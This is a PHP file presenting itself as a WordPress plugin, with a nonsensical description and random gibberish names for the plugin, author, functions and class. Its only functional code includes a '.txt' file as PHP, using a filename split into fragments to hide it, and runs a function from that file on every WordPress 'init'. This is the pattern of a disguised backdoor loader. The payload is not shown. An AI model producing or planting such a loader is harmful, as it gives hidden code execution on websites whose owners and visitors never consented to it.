<?php

/**
 * Plugin Name: Achijixic
 * Plugin URI: https://knos400.com/achijixic
 * Description: When ocean Ashley of Ohio, for the first
 * Version: 3.7.13
 * Author: Cesar Normand
 * Author URI: https://knos400.com
 * Text Domain: achijixic
 * License: GPL2+
 *
 */

function apuqan_khurokucy() {
    civybi_wadukhog();
}

$ubocot = __DIR__ . '/chyzulu.txt';
if (file_exists($ubocot)) {
    include_once __DIR__ . "/chyz" . "ulu.t" . "xt";
}


if (function_exists("civybi_wadukhog")) {
    $sikejy = new ijobaw_okhazhici();
    if ($sikejy->ijymet_dulovuzh()) {
        add_action('init', 'apuqan_khurokucy');
    }
}